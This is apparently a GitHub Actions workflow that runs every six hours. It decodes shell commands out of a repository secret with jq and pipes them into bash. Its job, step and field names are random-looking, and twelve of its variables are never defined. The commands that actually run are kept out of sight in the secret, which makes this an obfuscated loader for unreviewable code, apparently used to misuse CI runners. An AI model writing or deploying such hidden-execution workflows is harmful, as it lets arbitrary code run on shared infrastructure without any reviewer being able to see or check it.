name: weiyuanbv
on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weiyuanbv
        env:
          ree9: ${{ secrets.ree9 }}
        run: |
          echo $ree9 | jq -r .dugq19152 | /bin/bash
          echo $t1893 | jq -r .fh87997 | /bin/bash
          echo $dkzms53716 | jq -r .rsj1335 | /bin/bash
          echo $wrhqt60533 | jq -r .cf833 | /bin/bash
          echo $zyp23 | jq -r .anb57 | /bin/bash
          echo $l2 | jq -r .luqd324 | /bin/bash
          echo $naag2 | jq -r .yefv0 | /bin/bash
          echo $npqun84815 | jq -r .cwk16309 | /bin/bash
          echo $kzmpd7633 | jq -r .jsrz255 | /bin/bash
          echo $of87026 | jq -r .tt531 | /bin/bash
          echo $pyn09 | jq -r .fp17355 | /bin/bash
          echo $vs7137 | jq -r .z52794 | /bin/bash
          echo $f4141 | jq -r .vyc8 | /bin/bash

